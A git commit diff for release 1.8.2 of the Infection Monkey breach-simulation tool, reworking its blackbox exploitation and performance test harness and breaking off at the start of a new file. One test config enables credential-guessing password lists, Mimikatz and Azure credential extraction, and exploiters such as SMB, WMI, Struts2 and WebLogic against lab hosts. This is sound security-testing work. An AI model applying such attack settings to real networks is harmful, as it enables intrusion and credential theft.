Merge pull request #663 from guardicore/release/1.8.2

Release/1.8.2
Shay Nehmad 2020-06-07 16:04:00 +03:00 committed by GitHub
commit 3726a14f68
201 changed files with 9070 additions and 14830 deletions

.gitignore
View File

@ -82,5 +82,11 @@ MonkeyZoo/*
!MonkeyZoo/config.tf
!MonkeyZoo/MonkeyZooDocs.pdf
# Exported monkey telemetries
/monkey/telem_sample/
# Profiling logs
profiler_logs/
# vim swap files
*.swp

View File

@ -1,10 +1,15 @@
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.
# If you change this file, you can validate using Travis CI's Build Config Explorer https://config.travis-ci.com/explore
group: travis_latest
language: python
cache: pip
cache:
- pip
- directories:
- "$HOME/.npm"
python:
- 3.7
@ -18,6 +23,16 @@ install:
- pip install coverage # for code coverage
- pip install -r monkey/infection_monkey/requirements.txt # for unit tests
# node + npm + eslint
- node --version
- npm --version
- nvm --version
- nvm install node
- nvm use node
- npm i -g eslint
- node --version
- npm --version
before_script:
# Set the server config to `testing`. This is required for the UTs to pass.
- python monkey/monkey_island/cc/set_server_config.py testing
@ -36,7 +51,7 @@ script:
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=120
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Reduce the number of linter warnings in this branch and try again." && exit 1; fi
## Run unit tests
@ -48,13 +63,10 @@ script:
# Check JS code. The npm install must happen AFTER the flake8 because the node_modules folder will cause a lot of errors.
- cd monkey_island/cc/ui
- npm i
- npm i -g eslint
- cd -
- cd monkey_island/cc/ui
- eslint ./src --quiet
- JS_WARNINGS_AMOUNT_UPPER_LIMIT=37
- eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT
- npm ci # See https://docs.npmjs.com/cli/ci.html
- eslint ./src --quiet # Test for errors
- JS_WARNINGS_AMOUNT_UPPER_LIMIT=490
- eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT # Test for max warnings
after_success:
# Upload code coverage results to codecov.io, see https://github.com/codecov/codecov-bash for more information

View File

@ -1 +1,2 @@
logs/
/blackbox/tests/performance/telem_sample

View File

@ -10,10 +10,37 @@ In order to execute the entire test suite, you must know the external IP of the
this information in the GCP Console `Compute Engine/VM Instances` under _External IP_.
#### Running in command line
Run the following command:
Blackbox tests have the following parameters:
- `--island=IP` Sets the island's IP.
- `--no-gcp` (Optional) Use for no interaction with the cloud (local test).
- `--quick-performance-tests` (Optional) If enabled, performance tests won't reset the island and won't send telemetries;
instead, they will just test the performance of endpoints in the already present island state.
`monkey\envs\monkey_zoo\blackbox>python -m pytest --island=35.207.152.72:5000 test_blackbox.py`
Example run command:
`monkey\envs\monkey_zoo\blackbox>python -m pytest -s --island=35.207.152.72:5000 test_blackbox.py`
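For a local run that skips any GCP interaction, the optional flags above can be combined. A hypothetical invocation, reusing the example island address, might look like:
`monkey\envs\monkey_zoo\blackbox>python -m pytest -s --island=35.207.152.72:5000 --no-gcp test_blackbox.py`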
#### Running in PyCharm
Configure a PyTest configuration with the additional argument `--island=35.207.152.72` and the
Configure a PyTest configuration with the additional arguments `-s --island=35.207.152.72` and the
working directory set to `monkey\envs\monkey_zoo\blackbox`.
### Running telemetry performance test
**Before running the performance test, make sure the browser is not sending requests to the island!**
To run the telemetry performance test, follow these steps:
1. Gather monkey telemetries.
   1. Enable "Export monkey telemetries" in Configuration -> Internal -> Tests if you don't already have
   exported telemetries.
   2. Run the monkey and wait until the infection is done.
   3. All telemetries are gathered in `monkey/telem_sample`.
2. Run the telemetry performance test.
   1. Move the directory `monkey/test_telems` to `envs/monkey_zoo/blackbox/tests/performance/test_telems`.
   2. (Optional) Use `envs/monkey_zoo/blackbox/tests/performance/utils/telem_parser.py` to multiply the
   gathered telemetries.
      1. Run the `telem_parser.py` script with the working directory set to `monkey\envs\monkey_zoo\blackbox`.
      2. Pass an integer to indicate the multiplier. For example, running `telem_parser.py 4` will replicate the
      telemetries 4 times.
      3. If you're using PyCharm, check "Emulate terminal in output console" in the debug/run configuration.
3. The performance test will run as part of the BlackBox tests, or you can run it separately by adding the
`-k 'test_telem_performance'` option (see the example commands below).
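For example, assuming telemetries were already exported and moved as described above, a hypothetical sequence that multiplies them 4 times and then runs only the telemetry performance test (paths and island address taken from the examples above) could be:
`monkey\envs\monkey_zoo\blackbox>python tests\performance\utils\telem_parser.py 4`
`monkey\envs\monkey_zoo\blackbox>python -m pytest -s --island=35.207.152.72:5000 -k 'test_telem_performance' test_blackbox.py`
Depending on the setup, the `--no-gcp` and `--quick-performance-tests` flags described earlier can be added as well.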

View File

@ -1,59 +1,48 @@
import logging
from datetime import timedelta
from typing import Dict
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_URLS = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
logger = logging.getLogger(__name__)
LOGGER = logging.getLogger(__name__)
class PerformanceAnalyzer(Analyzer):
def __init__(self, island_client: MonkeyIslandClient, break_if_took_too_long=False):
self.break_if_took_too_long = break_if_took_too_long
self.island_client = island_client
def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
self.performance_test_config = performance_test_config
self.endpoint_timings = endpoint_timings
def analyze_test_results(self) -> bool:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
# Collect timings for all pages
self.island_client.clear_caches()
report_resource_to_response_time = {}
for url in REPORT_URLS:
report_resource_to_response_time[url] = self.island_client.get_elapsed_for_get_request(url)
# Calculate total time and check each page
def analyze_test_results(self):
# Calculate total time and check each endpoint
single_page_time_less_then_max = True
total_time = timedelta()
for page, elapsed in report_resource_to_response_time.items():
logger.info(f"page {page} took {str(elapsed)}")
for endpoint, elapsed in self.endpoint_timings.items():
total_time += elapsed
if elapsed > MAX_ALLOWED_SINGLE_PAGE_TIME:
if elapsed > self.performance_test_config.max_allowed_single_page_time:
single_page_time_less_then_max = False
total_time_less_then_max = total_time < MAX_ALLOWED_TOTAL_TIME
total_time_less_then_max = total_time < self.performance_test_config.max_allowed_total_time
logger.info(f"total time is {str(total_time)}")
PerformanceAnalyzer.log_slowest_endpoints(self.endpoint_timings)
LOGGER.info(f"Total time is {str(total_time)}")
performance_is_good_enough = total_time_less_then_max and single_page_time_less_then_max
if self.break_if_took_too_long and not performance_is_good_enough:
logger.warning(
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
return performance_is_good_enough
@staticmethod
def log_slowest_endpoints(endpoint_timings, max_endpoints_to_display=100):
slow_endpoint_list = list(endpoint_timings.items())
slow_endpoint_list.sort(key=lambda x: x[1], reverse=True)
slow_endpoint_list = slow_endpoint_list[:max_endpoints_to_display]
for endpoint in slow_endpoint_list:
LOGGER.info(f"{endpoint[0]} took {str(endpoint[1])}")

View File

@ -4,8 +4,23 @@ import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
parser.addoption("--no-gcp", action="store_true", default=False,
help="Use for no interaction with the cloud.")
parser.addoption("--quick-performance-tests", action="store_true", default=False,
help="If enabled performance tests won't reset island and won't send telemetries, "
"instead will just test performance of already present island state.")
@pytest.fixture(scope='module')
@pytest.fixture(scope='session')
def island(request):
return request.config.getoption("--island")
@pytest.fixture(scope='session')
def no_gcp(request):
return request.config.getoption("--no-gcp")
@pytest.fixture(scope='session')
def quick_performance_tests(request):
return request.config.getoption("--quick-performance-tests")

View File

@ -1,8 +1,8 @@
from datetime import timedelta
from time import sleep
import json
import logging
from time import sleep
from bson import json_util
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
@ -31,7 +31,7 @@ class MonkeyIslandClient(object):
@avoid_race_condition
def run_monkey_local(self):
response = self.requests.post_json("api/local-monkey", dict_data={"action": "run"})
response = self.requests.post_json("api/local-monkey", data={"action": "run"})
if MonkeyIslandClient.monkey_ran_successfully(response):
LOGGER.info("Running the monkey.")
else:
@ -96,13 +96,3 @@ class MonkeyIslandClient(object):
response = self.requests.get("api/test/clear_caches")
response.raise_for_status()
return response
def get_elapsed_for_get_request(self, url):
response = self.requests.get(url)
if response.ok:
LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
return response.elapsed
else:
LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
# instead of raising for status, mark failed responses as maxtime
return timedelta.max()

View File

@ -1,9 +1,15 @@
from typing import Dict
from datetime import timedelta
import requests
import functools
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
import logging
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
LOGGER = logging.getLogger(__name__)
@ -14,6 +20,26 @@ class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
self.token = self.try_get_jwt_from_server()
self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
SupportedRequestMethod.POST: self.post,
SupportedRequestMethod.PATCH: self.patch,
SupportedRequestMethod.DELETE: self.delete}
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
response = self.send_request_by_method(url, method, data)
if response.ok:
LOGGER.debug(f"Got ok for {url} content peek:\n{response.content[:120].strip()}")
return response.elapsed
else:
LOGGER.error(f"Trying to get {url} but got unexpected {str(response)}")
# instead of raising for status, mark failed responses as maxtime
return timedelta.max
def send_request_by_method(self, url, method=SupportedRequestMethod.GET, data=None):
if data:
return self.supported_request_methods[method](url, data)
else:
return self.supported_request_methods[method](url)
def try_get_jwt_from_server(self):
try:
@ -55,12 +81,20 @@ class MonkeyIslandRequests(object):
verify=False)
@_Decorators.refresh_jwt_token
def post_json(self, url, dict_data):
def post_json(self, url, data: Dict):
return requests.post(self.addr + url, # noqa: DUO123
json=dict_data,
json=data,
headers=self.get_jwt_header(),
verify=False)
@_Decorators.refresh_jwt_token
def patch(self, url, data: Dict):
return requests.patch(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False
)
@_Decorators.refresh_jwt_token
def delete(self, url):
return requests.delete( # noqa: DOU123

View File

@ -0,0 +1,8 @@
from enum import Enum
class SupportedRequestMethod(Enum):
GET = "GET"
POST = "POST"
PATCH = "PATCH"
DELETE = "DELETE"

View File

@ -2,14 +2,15 @@
"basic": {
"credentials": {
"exploit_password_list": [
"Password1!",
"12345678",
"^NgDvY59~8"
"Xk8VDTsC",
"^NgDvY59~8",
"Ivrrw5zEzs",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz"
],
"exploit_user_list": [
"Administrator",
"m0nk3y",
"user"
"m0nk3y"
]
},
"general": {
@ -23,11 +24,38 @@
"local_network_scan": false,
"subnet_scan_list": [
"10.2.2.2",
"10.2.2.4"
"10.2.2.3",
"10.2.2.4",
"10.2.2.5",
"10.2.2.8",
"10.2.2.9",
"10.2.1.10",
"10.2.0.11",
"10.2.0.12",
"10.2.2.11",
"10.2.2.12",
"10.2.2.14",
"10.2.2.15",
"10.2.2.16",
"10.2.2.18",
"10.2.2.19",
"10.2.2.20",
"10.2.2.21",
"10.2.2.23",
"10.2.2.24"
]
},
"network_analysis": {
"inaccessible_subnets": []
"inaccessible_subnets": [
"10.2.2.0/30",
"10.2.2.8/30",
"10.2.2.24/32",
"10.2.2.23/32",
"10.2.2.21/32",
"10.2.2.19/32",
"10.2.2.18/32",
"10.2.2.17/32"
]
}
},
"cnc": {
@ -45,10 +73,17 @@
"exploits": {
"general": {
"exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"MSSQLExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"HadoopExploiter"
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter"
],
"skip_exploit_if_file_exist": false
},
@ -57,9 +92,6 @@
"remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT"
},
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": {
"sambacry_folder_paths_to_guess": [
"/",
@ -109,7 +141,7 @@
"exploit_ssh_keys": []
},
"general": {
"keep_tunnel_open_time": 1,
"keep_tunnel_open_time": 60,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
},
@ -123,6 +155,9 @@
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true
},
"testing": {
"export_monkey_telems": true
}
},
"monkey": {
@ -137,24 +172,32 @@
},
"general": {
"alive": true,
"post_breach_actions": []
"post_breach_actions": [
"CommunicateAsNewUser"
]
},
"life_cycle": {
"max_iterations": 1,
"retry_failed_explotation": true,
"timeout_between_iterations": 100,
"victims_max_exploit": 7,
"victims_max_find": 30
"victims_max_exploit": 15,
"victims_max_find": 100
},
"system_info": {
"collect_system_info": true,
"extract_azure_creds": false,
"should_use_mimikatz": true
"extract_azure_creds": true,
"should_use_mimikatz": true,
"system_info_collectors_classes": [
"EnvironmentCollector",
"AwsCollector",
"HostnameCollector",
"ProcessListCollector"
]
}
},
"network": {
"ping_scanner": {
"ping_scan_timeout": 500
"ping_scan_timeout": 1000
},
"tcp_scanner": {
"HTTP_PORTS": [
@ -166,7 +209,7 @@
],
"tcp_scan_get_banner": true,
"tcp_scan_interval": 0,
"tcp_scan_timeout": 1000,
"tcp_scan_timeout": 3000,
"tcp_target_ports": [
22,
2222,
@ -179,7 +222,8 @@
8008,
3306,
9200,
7001
7001,
8088
]
}
}

View File

@ -1,6 +1,6 @@
import logging
import os
import logging
from bson import ObjectId
LOGGER = logging.getLogger(__name__)

View File

@ -1,8 +1,7 @@
import logging
import os
import shutil
import logging
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader

View File

@ -4,13 +4,18 @@ import logging
import pytest
from time import sleep
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import MapGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
ReportGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30
@ -22,15 +27,16 @@ LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
def GCPHandler(request):
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def GCPHandler(request, no_gcp):
if not no_gcp:
GCPHandler = gcp_machine_handlers.GCPHandler()
GCPHandler.start_machines(" ".join(GCP_TEST_MACHINE_LIST))
wait_machine_bootup()
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
def fin():
GCPHandler.stop_machines(" ".join(GCP_TEST_MACHINE_LIST))
request.addfinalizer(fin)
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
@ -44,9 +50,10 @@ def wait_machine_bootup():
@pytest.fixture(scope='class')
def island_client(island):
def island_client(island, quick_performance_tests):
island_client_object = MonkeyIslandClient(island)
island_client_object.reset_env()
if not quick_performance_tests:
island_client_object.reset_env()
yield island_client_object
@ -55,34 +62,32 @@ def island_client(island):
class TestMonkeyBlackbox(object):
@staticmethod
def run_basic_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
def run_exploitation_test(island_client, conf_filename, test_name, timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
config_parser = IslandConfigParser(conf_filename)
analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(
ExploitationTest(
name=test_name,
island_client=island_client,
config_parser=config_parser,
analyzers=[analyzer],
timeout=timeout_in_seconds,
post_exec_analyzers=[],
log_handler=log_handler).run()
@staticmethod
def run_performance_test(island_client, conf_filename, test_name, timeout_in_seconds):
def run_performance_test(performance_test_class, island_client,
conf_filename, timeout_in_seconds, break_on_timeout=False):
config_parser = IslandConfigParser(conf_filename)
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(
name=test_name,
island_client=island_client,
config_parser=config_parser,
analyzers=[CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())],
timeout=timeout_in_seconds,
post_exec_analyzers=[PerformanceAnalyzer(
island_client,
break_if_took_too_long=False
)],
log_handler=log_handler).run()
log_handler = TestLogsHandler(performance_test_class.TEST_NAME,
island_client,
TestMonkeyBlackbox.get_log_dir_path())
analyzers = [CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())]
performance_test_class(island_client=island_client,
config_parser=config_parser,
analyzers=analyzers,
timeout=timeout_in_seconds,
log_handler=log_handler,
break_on_timeout=break_on_timeout).run()
@staticmethod
def get_log_dir_path():
@ -92,43 +97,42 @@ class TestMonkeyBlackbox(object):
assert island_client.get_api_status() is not None
def test_ssh_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SSH.conf", "SSH_exploiter_and_keys")
def test_hadoop_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6*60)
TestMonkeyBlackbox.run_exploitation_test(island_client, "HADOOP.conf", "Hadoop_exploiter", 6 * 60)
def test_mssql_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "MSSQL.conf", "MSSQL_exploiter")
def test_smb_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SMB_MIMIKATZ.conf", "SMB_exploiter_mimikatz")
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SMB_PTH.conf", "SMB_PTH")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SMB_PTH.conf", "SMB_PTH")
def test_elastic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "ELASTIC.conf", "Elastic_exploiter")
def test_struts_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "STRUTS2.conf", "Strtuts2_exploiter")
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WEBLOGIC.conf", "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
TestMonkeyBlackbox.run_exploitation_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15*60)
TestMonkeyBlackbox.run_exploitation_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15 * 60)
def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")
TestMonkeyBlackbox.run_exploitation_test(island_client, "WMI_PTH.conf", "WMI_PTH")
@pytest.mark.xfail(reason="Performance is slow, will improve on release 1.9.")
def test_performance(self, island_client):
def test_report_generation_performance(self, island_client, quick_performance_tests):
"""
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
for a total of 8 machines including the Monkey Island.
@ -136,8 +140,30 @@ class TestMonkeyBlackbox(object):
It has 2 analyzers - the regular one which checks all the Monkeys
and the Timing one which checks how long the report took to execute
"""
TestMonkeyBlackbox.run_performance_test(
island_client,
"PERFORMANCE.conf",
"test_report_performance",
timeout_in_seconds=10*60)
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
def test_map_generation_performance(self, island_client, quick_performance_tests):
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(MapGenerationTest,
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
def test_report_generation_from_fake_telemetries(self, island_client, quick_performance_tests):
ReportGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
def test_map_generation_from_fake_telemetries(self, island_client, quick_performance_tests):
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
def test_telem_performance(self, island_client, quick_performance_tests):
TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance()

View File

@ -1,100 +1,8 @@
from time import sleep
import logging
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
import abc
class BasicTest(object):
def __init__(self, name, island_client, config_parser, analyzers, timeout, post_exec_analyzers, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.post_exec_analyzers = post_exec_analyzers
self.timeout = timeout
self.log_handler = log_handler
class BasicTest(abc.ABC):
@abc.abstractmethod
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.test_post_exec_analyzers()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
return all(analyzers_results)
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed > MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when the monkey is set to dead, but the process is still closing.
If we try to launch a monkey during that time window, it will fail to start; that's
why the test needs to wait a bit even after all monkeys are dead.
"""
LOGGER.debug("Waiting for Monkey process to close...")
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)
def test_post_exec_analyzers(self):
post_exec_analyzers_results = [analyzer.analyze_test_results() for analyzer in self.post_exec_analyzers]
assert all(post_exec_analyzers_results)
pass

View File

@ -0,0 +1,94 @@
import logging
from time import sleep
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.utils.test_timer import TestTimer
MAX_TIME_FOR_MONKEYS_TO_DIE = 5 * 60
WAIT_TIME_BETWEEN_REQUESTS = 10
TIME_FOR_MONKEY_PROCESS_TO_FINISH = 40
DELAY_BETWEEN_ANALYSIS = 3
LOGGER = logging.getLogger(__name__)
class ExploitationTest(BasicTest):
def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler):
self.name = name
self.island_client = island_client
self.config_parser = config_parser
self.analyzers = analyzers
self.timeout = timeout
self.log_handler = log_handler
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish()
self.parse_logs()
self.island_client.reset_env()
def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
print("")
def test_until_timeout(self):
timer = TestTimer(self.timeout)
while not timer.is_timed_out():
if self.all_analyzers_pass():
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
def all_analyzers_pass(self):
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
return all(analyzers_results)
def get_analyzer_logs(self):
log = ""
for analyzer in self.analyzers:
log += "\n" + analyzer.log.get_contents()
return log
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))
if time_passed > MAX_TIME_FOR_MONKEYS_TO_DIE:
LOGGER.error("Some monkeys didn't die after the test, failing")
assert False
def parse_logs(self):
LOGGER.info("Parsing test logs:")
self.log_handler.parse_test_logs()
@staticmethod
def wait_for_monkey_process_to_finish():
"""
There is a time period when the monkey is set to dead, but the process is still closing.
If we try to launch a monkey during that time window, it will fail to start; that's
why the test needs to wait a bit even after all monkeys are dead.
"""
LOGGER.debug("Waiting for Monkey process to close...")
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)

View File

@ -0,0 +1,28 @@
import logging
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
